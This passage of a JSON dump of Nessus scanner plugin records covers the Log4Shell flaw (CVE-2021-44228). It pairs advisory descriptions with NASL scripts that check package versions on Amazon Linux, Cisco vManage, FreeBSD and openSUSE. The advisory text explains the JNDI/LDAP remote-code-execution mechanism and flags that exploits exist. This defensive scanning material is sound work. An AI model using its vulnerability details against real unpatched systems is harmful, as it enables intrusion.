\"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'log4j-cve-2021-44228-hotpatch-1.3-5.amzn1', 'release':'ALA', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j-cve-2021-44228-hotpatch\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-27T21:35:20", "description": "Cisco SD-WAN vManage is affected by the following critical vulnerability in the Apache Log4j Java logging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2022-05-16T00:00:00", "type": "nessus", "title": "Cisco SD-WAN vManage Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-27T00:00:00", "cpe": ["cpe:/a:cisco:sd-wan_vmanage", "cpe:/o:cisco:sd-wan_firmware"], "id": "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "href": "https://www.tenable.com/plugins/nessus/161212", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161212);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/27\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa47745\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-apache-log4j-qRuKNEbd\");\n script_xref(name:\"IAVA\", value:\"2022-A-0138-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n\n script_name(english:\"Cisco SD-WAN vManage Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A package installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Cisco SD-WAN vManage is affected by the following critical vulnerability in the Apache Log4j Java \nlogging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?395cf983\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCwa47745\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:sd-wan_vmanage\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:sd-wan_firmware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_vedge_detect.nbin\");\n script_require_keys(\"Cisco/Viptela/Version\", \"Cisco/Viptela/Model\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Viptela');\n\nif (tolower(product_info['model']) !~ \"vmanage\")\n audit(AUDIT_HOST_NOT, 'an affected model');\n\nvar vuln_ranges = [\n { 'min_ver' : '20.3', 'fix_ver' : '20.3.4.1' },\n { 'min_ver' : '20.4', 'fix_ver' : '20.4.2.1' },\n { 'min_ver' : '20.5', 'fix_ver' : '20.5.1.1' },\n { 'min_ver' : '20.6', 'fix_ver' : '20.6.2.1' }\n];\n\n \nvar reporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'bug_id' , 'CSCwa47745',\n 'version' , product_info['version'],\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n vuln_ranges:vuln_ranges,\n reporting:reporting\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-29T00:13:29", "description": "A remote code execution vulnerability exists in Apache Log4j < 2.15.0 due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can explolit this, via a web request to execute arbitrary code with the permission level of the running Java process.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-16T00:00:00", "type": "nessus", "title": "Apache Log4Shell RCE detection via callback correlation (Direct Check FTP)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-28T00:00:00", "cpe": ["cpe:/a:apache:log4j"], "id": "LOG4J_LOG4SHELL_FTP.NBIN", "href": "https://www.tenable.com/plugins/nessus/156115", "sourceData": "Binary data log4j_log4shell_ftp.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-29T22:36:14", "description": "The version of log4j-cve-2021-44228-hotpatch installed on the remote host is prior to 1.3-5. It is, therefore, affected by a vulnerability as referenced in the ALAS2-2022-1806 advisory.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-16T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : log4j-cve-2021-44228-hotpatch (ALAS-2022-1806)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-29T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:log4j-cve-2021-44228-hotpatch", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2022-1806.NASL", "href": "https://www.tenable.com/plugins/nessus/162309", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2022-1806.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162309);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/29\");\n\n script_name(english:\"Amazon Linux 2 : log4j-cve-2021-44228-hotpatch (ALAS-2022-1806)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of log4j-cve-2021-44228-hotpatch installed on the remote host is prior to 1.3-5. It is, therefore, affected\nby a vulnerability as referenced in the ALAS2-2022-1806 advisory.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2022-1806.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update log4j-cve-2021-44228-hotpatch' to update your system.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:log4j-cve-2021-44228-hotpatch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'log4j-cve-2021-44228-hotpatch-1.3-5.amzn2', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j-cve-2021-44228-hotpatch\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-28T22:21:21", "description": "A remote code execution vulnerability exists in Apache Log4j < 2.15.0 due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can explolit this, via a web request to execute arbitrary code with the permission level of the running Java process.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2022-01-07T00:00:00", "type": "nessus", "title": "Apache Log4Shell RCE detection via callback correlation (Direct Check RPCBIND)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-28T00:00:00", "cpe": ["cpe:/a:apache:log4j"], "id": "LOG4J_LOG4SHELL_RPCBIND.NBIN", "href": "https://www.tenable.com/plugins/nessus/156559", "sourceData": "Binary data log4j_log4shell_rpcbind.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T23:37:15", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:graylog", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "href": "https://www.tenable.com/plugins/nessus/156021", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156021);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/18\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar\n org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see\n https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code\n execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and\n com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://github.com/Graylog2/graylog2-server/commit/d3e441f1126f0dc292e986879039a87c59375b2a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0936599f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://logging.apache.org/log4j/2.x/security.html\");\n # https://vuxml.freebsd.org/freebsd/3fadd7e4-f8fb-45a0-a218-8fd6423c338f.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?90d622ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:graylog\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'graylog<4.2.3'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:19:37", "description": "The remote host appears to be running an SMTP server. SMTP itself is not vulnerable to Log4Shell; however, the SMTP server could potentially be affected if it attempts to log data via a vulnerable log4j library.\n\nThis plugin requires that both the scanner and target machine have internet access.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-17T00:00:00", "type": "nessus", "title": "Apache Log4Shell RCE detection via callback correlation (Direct Check SMTP)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-28T00:00:00", "cpe": ["cpe:/a:apache:log4j"], "id": "APACHE_LOG4SHELL_SMTP.NBIN", "href": "https://www.tenable.com/plugins/nessus/156132", "sourceData": "Binary data apache_log4shell_smtp.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T23:35:15", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:1586-1 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-12-17T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1586-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:log4j", "p-cpe:/a:novell:opensuse:log4j-javadoc", "p-cpe:/a:novell:opensuse:log4j-jcl", "p-cpe:/a:novell:opensuse:log4j-slf4j", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-1586.NASL", "href": "https://www.tenable.com/plugins/nessus/156150", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1586-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156150);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/18\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n\n script_name(english:\"openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1586-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:1586-1 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193611\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/MM3SIUADOVLPKKTSRFXAGFZXOZH63CFG/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d0e0a2b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-44228\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j, log4j-javadoc, log4j-jcl and / or log4j-slf4j packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-jcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-slf4j\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by 